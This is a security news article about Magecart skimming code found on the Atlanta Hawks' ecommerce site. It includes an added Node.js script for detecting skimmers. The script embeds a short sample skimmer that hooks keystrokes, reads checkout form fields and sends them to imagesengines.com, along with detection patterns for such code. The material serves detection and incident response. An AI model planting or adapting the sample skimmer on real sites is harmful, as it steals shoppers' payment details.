Naked Security

Atlanta Hawks fall prey to Magecart credit card skimming group

The Atlanta Hawks basketball team is recovering after a sophisticated cybercrime group hacked its ecommerce site and planted credit card skimming code on it.

Researchers at Sanguine Security found the skimmer on the NBA team’s ecommerce site. Anyone who entered payment details there on or after 20 April 2019 had their name, address, and credit card details captured by the malicious code, which logs the customer’s keystrokes at the point of entry, as the details are typed into the checkout form.

The researchers built a Magecart detection tool that scans websites for telltale code. On the Hawks site it found obfuscated JavaScript. The team rendered it into a readable format and found instructions to log visitors’ keystrokes. They then confirmed what the code did at runtime using Chrome Developer Tools, whose Network panel shows every request a page makes: alongside the regular requests you’d expect a checkout page to send to the Hawks’ own servers, the page was also sending the logged keystrokes to imagesengines.com, an outside domain.
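The three steps described above (look for obfuscated JavaScript, render it readable, then watch the Network panel for page data leaving to a domain the site has no business talking to) can be automated. The following Node.js script is an added example written for this article; it is not Sanguine Security’s scanner and not code from the Hawks site. The skimmer snippet and request list it runs on are constructed sample data, the first-party allowlist and the query-length threshold are assumptions, and imagesengines.com appears only because the researchers named it as the exfiltration domain.

```javascript
// Added example, not Sanguine Security's scanner or the Hawks site's code.
// Three small checks a responder can run over a checkout page, on constructed
// sample data so the script runs offline under Node.js:
//   decodeHexEscapes()  - the "render it readable" step for \xNN-packed strings
//   scoreScript()       - flags JavaScript that looks obfuscated and hooks
//                         keystrokes or form fields
//   findExfiltration()  - flags requests (DevTools Network panel / HAR export)
//                         that carry data to a host outside the site's allowlist

// Turn \x6b\x65\x79\x75\x70 into "keyup": the first thing to do with a packed skimmer.
function decodeHexEscapes(source) {
  return source.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Telltale constructs. None is conclusive on its own (minified libraries use
// some of them), so a script is flagged only when several co-occur.
const INDICATORS = [
  { label: 'hex-escaped strings',            re: /(\\x[0-9a-f]{2}){4,}/i },
  { label: 'String.fromCharCode decoding',   re: /String\.fromCharCode/ },
  { label: 'runtime decode (atob/unescape)', re: /\b(atob|unescape)\s*\(/ },
  { label: 'eval / Function constructor',    re: /\beval\s*\(|new\s+Function\s*\(/ },
  { label: 'keystroke hook',                 re: /addEventListener\s*\(\s*['"](keyup|keydown|keypress|input)['"]/ },
  { label: 'reads form fields',              re: /querySelectorAll\s*\(\s*['"](input|select|textarea)/ },
  { label: 'image beacon',                   re: /new\s+Image\s*\(/ },
];

function scoreScript(source) {
  // Decode first so indicators hidden inside \xNN strings are seen as well.
  const decoded = decodeHexEscapes(source);
  const hits = INDICATORS
    .filter(i => i.re.test(source) || i.re.test(decoded))
    .map(i => i.label);
  return { suspicious: hits.length >= 3, hits };
}

// Hosts a checkout page is expected to talk to. Assumed for this example; a
// real allowlist comes from the site owner and payment provider documentation.
const ALLOWED_HOSTS = new Set(['hawksshop.com', 'www.hawksshop.com']);

function findExfiltration(requests, allowedHosts = ALLOWED_HOSTS) {
  const findings = [];
  for (const r of requests) {
    const url = new URL(r.url);
    if (allowedHosts.has(url.hostname)) continue;
    // Third-party traffic is normal (CDNs, analytics). What is not normal is
    // customer data leaving with the request: a POST body, or a GET whose query
    // string is long enough to carry a form's worth of data (the 32-byte
    // threshold is an assumption; tune it for the site).
    const carriesData = r.method === 'POST' || url.search.length > 32;
    if (carriesData) findings.push({ host: url.hostname, method: r.method, url: r.url });
  }
  return findings;
}

// Constructed sample script: a packed keyup hook that reads the form and sends
// it out through an image request. It is only pattern-matched, never executed.
const SAMPLE_SKIMMER = `var _0x3f=["\\x6b\\x65\\x79\\x75\\x70","\\x69\\x6e\\x70\\x75\\x74\\x2c\\x73\\x65\\x6c\\x65\\x63\\x74"];
document.addEventListener("keyup",function(){var v=[];document.querySelectorAll("input,select").forEach(function(i){v.push(i.name+"="+i.value)});
var b=new Image();b.src="https://imagesengines.com/i.gif?d="+btoa(v.join("&"));});`;

// Constructed benign script (an analytics bootstrap) for comparison.
const SAMPLE_BENIGN = `window.dataLayer=window.dataLayer||[];function gtag(){dataLayer.push(arguments)}gtag("js",new Date());`;

// Constructed request list, as the Network panel or a HAR export would show it.
const SAMPLE_REQUESTS = [
  { method: 'GET',  url: 'https://www.hawksshop.com/checkout/' },
  { method: 'POST', url: 'https://www.hawksshop.com/checkout/submit' },
  { method: 'GET',  url: 'https://cdn.example-cdn.net/jquery.min.js' },
  { method: 'GET',  url: 'https://imagesengines.com/i.gif?d=bmFtZT1KK0RvZSZjYz00MTExMTExMTExMTExMTEx' },
  { method: 'POST', url: 'https://imagesengines.com/collect' },
];

console.log('skimmer :', scoreScript(SAMPLE_SKIMMER));
console.log('benign  :', scoreScript(SAMPLE_BENIGN));
console.log('exfil   :', findExfiltration(SAMPLE_REQUESTS));
```

For a real incident, replace the sample strings with the inline and third-party script bodies from the page and the request list with the entries of a HAR export taken while completing a test checkout; the skimmer only fires on the checkout form, so a capture of the home page will show nothing.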

The researchers believe the attackers may have gained access through a third-party component running on the Hawks ecommerce site, which is built on Magento Commerce Cloud, the Adobe-owned ecommerce platform. Sanguine said:

Our previous research has uncovered a range of popular vectors: database management tools, marketing plugins and connected accounting software are in the top-3.

Magecart isn’t a single hacking group; it’s an umbrella name for a number of groups that specialize in skimming payment card details from ecommerce checkout pages. There are at least seven, according to an investigation by security company RiskIQ. What they have in common is the target: online checkout pages, Magento-based stores in particular, which is where the name comes from. Past victims include Ticketmaster, British Airways, and online retailer Newegg.

RiskIQ says it spotted the first group in 2015, and the activities evolved from there. Some groups use the same infrastructure, but their modus operandi differs. Some of them use automated spray-and-pray attack tools to breach sites, while others are more selective, targeting large brands for big payoffs.

Some groups monetize stolen credit card data by purchasing goods fraudulently and shipping them to mules in the US. The mules, often recruited via work-from-home job scams, forward them to Eastern Europe where the cybercriminals sell them on.

The Hawks reportedly disabled all payment and checkout functions on hawksshop.com to prevent any further skimming, adding:

At this stage of the investigation, we believe that less than a handful of purchases on Hawksshop.com were affected.